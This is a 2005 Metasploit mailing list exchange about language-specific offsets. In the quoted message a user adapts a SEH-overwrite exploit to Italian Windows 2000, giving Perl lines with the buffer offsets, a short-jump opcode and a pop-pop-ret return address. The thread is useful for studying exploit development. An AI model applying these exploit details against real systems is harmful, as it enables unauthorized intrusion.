Metasploit mailing list archives different offset for different languages

From: jerome.athias at (Jerome Athias)
Date: Tue, 13 Dec 2005 16:37:53 +0100


you can try to use my little international opcodes database:

it is provided "as is" with no warranty (it's not a MSF team project)
if you can help with other platforms/langages => mail me ;-)


msf-list at wrote:

Hi i'm playing with
with my win00 Italian version (SP0) and the exploit don't work;
after a little debug session i understand why.

For the italian version the correct offset is 360 so i have add this:

 # Windows 2000 Italian SP0 SEH offset 
      substr($pattern, 360 + $hlen + 0, 4, pack('V', $target->[1]));
      substr($pattern, 360 + $hlen - 4, 2, "\xeb\x22");

for the english version (win00)the offset is:

# Windows 2000 SEH offset goes first
      substr($pattern, 332 + $hlen + 0, 4, pack('V', $target->[1]));
      substr($pattern, 332 + $hlen - 4, 2, "\xeb\x22");

It's the same for the Win00 Advenced Server Italian version (SP4)

The only differnce is the offset, the return address is always the 
x004014e9 (pop pop ret)

Someone know if the same for different languages?
For example French,Spanish or German version of win00?

Thank you for your attention and sorry for my bad english :-(



Current thread: